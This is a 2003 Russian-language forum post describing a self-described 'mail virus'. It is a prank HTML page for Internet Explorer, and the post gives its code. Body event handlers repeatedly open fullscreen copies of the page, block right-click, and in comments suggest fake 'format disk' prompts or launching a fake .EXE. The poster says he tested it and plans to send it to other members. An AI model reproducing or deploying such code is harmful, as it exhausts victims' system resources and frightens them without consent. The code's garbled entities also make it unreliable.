Показать сообщение отдельно
Старый 24.08.2003, 22:54   #15
McLaud
Newbie
 
Регистрация: 23.08.2003
Сообщений: 8
По умолчанию Новый почтовый вирус

Цитата:
и все что ли? Опера рулит
Не... Это как раз для отмазки, чтоб все так думали. Эта строчка только в ИЕ работает.
Опера рулит лучше, чем ИЕ как раз из-за нее, но тоже как умная Маша отрывает сто окон. В ИЕ бывает часто, что и перезагружаться надо, поскольку "Системе существенно не хватает ресурсов!". На том суть и основана. НетКаптор со второго окна понимает, что фигня в файле и не дает больше открывать.
Только все одно 90% юзеров и я с ними юзают ИЕ, и впредь юзать будут. Потому на них и расчет. Это на любой сайт с тыщей народу в день сходить и посмотреть статистику юзеров: http://top.mail.ru/stat?id=7753;what=sys;period=1
Цитата:
Давай исходник. На чем написан?
Ни на чем. На динамическом HTML, если так можно сказать.
А суть файла простая и в таких словах:
<body
onLoad=&#34;full(&#39;menu.html&#39&#34;
onUnLoad=&#34;full(&#39;menu.htm&#39&#34;
onMouseOver=&#34;full1(&#39;menu.htm&#39&#34;>
(Эти слова в трех одинаковых файлах index.htm, menu.htm,menu.html в папке BigBill.)
то есть по всем мыслимым событиям юзера окно открывается в полный рост и загружает свои дубли. Ну, и файлик должен быть маленький, чтобы завгрузиться успеть.
В файлик тоже для отмазки пару строчек full1(&#39;menu.htm&#39 вставить.
А full1(&#39;menu.htm&#39 - это такая штука:
function full1(x){
window.open(x, &#39;&#39;, &#39;fullscreen=yes&#39;
if (document.all) document.body.onmousedown=new Function(&#34;if (event.button==2&#0124;&#0124;event.button==3)aler t(&#39;No! You don not able!&#39&#34;
//сюда вот как раз можно фигню всякую вставить для попсы
//типа не alert, а confirm(&#34;Форматировать диск A или не надо?&#34
// или full1(&#39;VIRUS_BIG_BILL.EXE&#39&#34; или чередовать
}

Короче парение мозгов натуральное.
Но психологически работает неплохо. Проверял неоднократно.
Добрая такая шутка.
Я ее Джеку пошлю в письме потом. Он самый продвинутый, мне кажется. И Хильге, чтобы не скучала.

Цитата:
А про скан портов ничего не слышал? А про удаленное подключение к твоей машине через 139 порт? А про ДОС-атаки ничего не слышал?
Никогда реально не видел, только слова слышал. Был бы премного благодарен, если кто бы пример привел реального скана какого-нибюудь компа или атаки, вот по типу, как я ссылку вставил. А потом бы так же и рассказал, где собака зарыта.
Могу свой комп на такой эксперимент отдать. А то чего тут философию разводить.
McLaud вне форума  
Реклама